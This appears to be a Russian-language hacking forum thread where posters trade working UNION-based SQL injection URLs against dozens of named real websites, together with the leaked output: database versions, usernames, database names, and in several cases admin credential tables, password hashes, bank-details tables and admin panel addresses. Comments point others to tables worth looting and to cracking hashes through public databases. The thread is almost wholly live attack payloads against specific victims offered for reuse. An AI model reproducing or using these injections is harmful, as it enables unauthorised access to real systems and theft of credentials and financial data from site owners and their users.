Code: http://www.bdva.ru/funclub_details.phtml?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11-- 5.0.45-log:[email protected]:bdva Code: http://ksr.infoshare.ru/lib/?div=-5+union+select+concat_ws(0x3a,user(),version(),database())-- ksrinfoshare@localhost:5.0.51a-log:h_ksr Code: http://www.greeceforyou.ru/hotels.php?id=76/**/union/**/select/**/1,concat_ws(0x3a,user(),version(),database()),3/* [email protected]:4.0.27-log:greeceforyou-ru Code: http://www.avtodirect.ru/doc.php?supplyID=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database())/* 4.0.16-log:avtodirect@localhost:avtodirect_ru
HTML: http://www.tax.vsem.com.ua/index.php?page=news.html&idnn=2432+union+select+1,2,3,4,concat_ws%280x3a,unhex%28hex%28version%28%29%29%29,unhex%28hex%28user%28%29%29%29,unhex%28hex%28database%28%29%29%29%29+from+information_schema.tables-- 5.0.18-nt-log:[email protected]:1gbua_seren HTML: http://www.jamescourtney.com.au/media/news?id=4+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5-- 5.0.81-community:jamescou_jamesco@localhost:jamescou_shockcustom HTML: http://www.gpstuner.com/en/news?id=99999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 5.1.35-log:gpstuner@localhost:gpstuner HTML: http://linvo.org/?page=news&id=99999+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5-- 5.0.32-Debian_7etch11-log:linvo@localhost:linvo
http://www.olimpia-auto.com.ua/news.php?mid=news&nid=-4+union+select+1,2,group_concat(0x0b,oa_login,0x3a,oa_pswd_md5,0x3a,email,0x3a,def_discount),4+from+oa_users MySQL 5.0.81-log также есть интересные таблицы bank_rekvizit carts думаю ясно что в них можно найти) http://www.olimpia-auto.com.ua/news.php?mid=news&nid=-4+union+select+1,2,group_concat(0x0b,id_br,0x3a,bk_name,0x3a,rekvizit,0x3a,schet,0x3a,name,0x3a,nal),4+from+bank_rekvizit ============================ http://www.wismamerdeka.com/shop_info.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(0x0b,username,0x3a,password),14,15,16,17,18,19,20,21,22+from+_user MySQL5.0.51b-community-nt http://www.wismamerdeka.com/admin.php з.Ы. Чет сегодня на скули фартит, со всем бы так)
medpipe.ru - - - http://www.medpipe.ru/main/index.html?id=1&nid=9/**/and/**/1=7/**/union/**/all/**/select/**/1,2,3,version(),5,6 version - 5.0.51a-24+lenny2-log user - medpipe_ru@localhost database - medpipe_ru os - debian-linux-gnu table - user - (user_login, user_password) http://www.medpipe.ru/main/index.html?id=1&nid=9/**/and/**/1=7/**/union/**/all/**/select/**/1,2,3,concat(user_login,0x3a3a3a,user_password),5,6/**/from/**/sys_users/**/limit/**/1,1
http://season-logistics.com/news_show.php?showlei=&Leiid=2&n=1&id=-5+union+select+1,2,3,group_concat(0x0b,column_name),5,6,7+from+information_schema.columns+where+table_name=0x666b5f61646d696e fk_admin::name,Password MySQL 5.0.81-community-log http://season-logistics.com/news_show.php?showlei=&Leiid=2&n=1&id=-5+union+select+1,group_concat(0x0b,name,0x3a,password),3,4,5,6,7+from+fk_admin
INSTITUTE FOR MEDICAL RESEARCH AND OCCUPATIONAL HEALTH: Code: http://www.imi.hr/stranica.php?id=11+union+select+1,2,3-- Version: 5.0.51a-24+lenny2 Database: imi@localhost User: imi
http://www.medialine.eu/sezioni.php?m=79&mm=97&mmm=72&id=27+UNION+SELECT+concat_ws(0x3a,version(),user(),database(),@@version_compile_os),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56/* Database Version: 4.1.22-standard-log Database name: medialine_eu_medialine User name: [email protected] Os: pc-linux-gnu
Code: http://hmm3.fclan.ru/redir.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 5.0.45:us1204h@localhost:db1204a Code: http://g-tuning.ru/models/model/?mark=10&model=-112+union+select+concat_ws(0x3a,version(),user(),database()) 5.0.67:u2039@localhost:gtuningru
Строительная компания "НЭП": Code: http://www.sk-nep.ru/files.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10-- Version: 5.0.45 Database: sk-nep_main User: db_sk-nep@localhost
http://www.excelsoft.co.id/read_news.php?id=-44+union+select+1,2,group_concat(0x0b,name,0x3a,passw),4,5+from+admin MySQL 5.0.51a-log ============================= http://santafe-club.ru/view_page.php?id=-45+union+select+1,group_concat(0x0b,column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name=0x70687062625f7573657273 http://santafe-club.ru/view_page.php?id=-45+union+select+1,group_concat(0x0b,user_id,0x3a,username,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+phpbb_users MySQL 5.0.77-log логинимся в форуме
http://www.ior.ro/produse/index.php?kCtg=6&ID=-50+UNION+SELECT+1,2,3,4,convert(concat_ws(0x3a,version(),database(),user(),@@version_compile_os)+using+latin1),6,7,8,9,10-- Database Version: 4.1.11-Debian_4sarge7-log Database name: dbior User name: ior@localhost Os: pc-linux-gnu
http://www.cilvekaekologija.lv/index.html?id=1/**/and/**/1=2/**/union/**/all/**/select/**/1,2,unhex(hex(version())),4,5,6,7,8,9/* version - 4.1.14 user - avestl@localhost database - cilveko
www.euroasiasemiconductor.com/magazine.php?id=45+union+select+1,group_concat(0x0b,user_id,0x3a,name,0x3a,password,0x3a,email),3,4,5,6,7+from+cieh_users&date=2007-02-03 MySQL 5.0.45
http://www.farmavet.ro/prez_produs.php?id=-76+UNION+SELECT+1,2,3,cast(concat_ws(0x3a,version(),database(),user(),@@version_compile_os)+as+binary),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61-- Database Version: 4.1.11-nt Database name: farmavet User name: ifarmavet@localhost Os: win32
Code: http://vetka.server.by/?id=-3+union+select+1,concat_ws(0x3a,version(),user(),database())-- 4.1.22:vetka@localhost:vetka Code: http://www.radiozavod.com/?prod=-16+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4-- 5.0.81-community:radio_radio@localhost:radio_radio Code: http://klinok-blade.ru/rubrikator/index.php?id=999999+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6-- 5.0.67-log:[email protected]:u82142 Code: http://www.kon-tiki.com.ua/index.php?w=country&lang=ru&id=-6+union+select+1,concat_ws(0x3a,version(),user(),database()),3-- 5.0.45-log:[email protected]:kontiki Code: http://rock.aplus.by/providers/?id=-9+union+select+concat_ws(0x3a,version(),user(),database()),2,3-- 5.0.32- Debian_7etch11:rockaplusby@localhost:rockaplusby Code: http://www.almaz-pk.ru/articles?id=99999+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5-- 5.0.82-log:[email protected]:almazpk_tmp Code: http://www.elitstroymaterials.ru/inside.html?action=news&id=-5+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6-- 5.0.77:elitstro_elit@localhost:elitstro_elit
2pelligrim, скулю на santafe-club.Ru я выкладывал на прошлой стр http://www.solitaire-labs.com/article_show.php?id=-5+union+select+1,2,group_concat(0x0b,column_name),4,5,6,7,8+from+information_schema.columns+where+table_name=0x61646d696e75736572 MySQL 5.0.81-community http://www.solitaire-labs.com/article_show.php?id=-5+union+select+1,2,group_concat(0x0b,adminuser,0x3a,password,0x3a,level),4,5,6,7,8+from+adminuser админка http://www.solitaire-labs.com/admin ============================== http://serbianbaseball.org/view_news.php?id=-4+union+select+1,group_concat(0x0b,id,0x3a,user,0x3a,pass),3,4+from+admin MySQL 5.0.81-community ============================== Забугорный Вэб - Хостинг www.risingnet.net/news_info.php?id=-4+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables+limit+28,1 MySQL 5.0.45 http://www.risingnet.net/news_info.php?id=-4+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name=0x757365725f6163636f756e74+limit+32,1 интересные таблицы user_account, user_webinfo думаю можно убить время и докрутить до логического конца, мне не хватило желания
Магазин «Деревянный Рай»: Code: http://www.pskovles.ru/tovar.php?id=-1+union+select+1,2,3/* Version: 4.1.22-log Database: konkurent_svoi User: konkurent_svoi@localhost
http://greenstreetprop.com/view_users.php?id=-4+union+select+1,column_name,3+from+information_schema.columns+where+table_name=0x64656661756c745f557365724442-- интересные таблици: default_UserDB::ID:user_name:email_Address:user_password:isAdmin default_UserDBElements default_memberFormElements default_userFavoriteListings default_userFormElements default_userImages default_userSavedSearches долбить буду default_UserDB http://greenstreetprop.com/view_users.php?id=-4+union+select+1,concat_ws(0x3a,user_name,0x3a,user_password),3+from+default_UserDB-- хэш админа отлично находит на паблик базах админка: http://greenstreetprop.com/admin MySQL 5.0.82sp 1 удобно что выводит все строки сразу, не надо играться с лимитами и гроуп конкатом. слепая
[email protected]:u15468:5.0.67-log если и это боян, то объясни мне как ты степень боянности определяешь ? специально проверил на все ключевые слова в поиске, его нету.
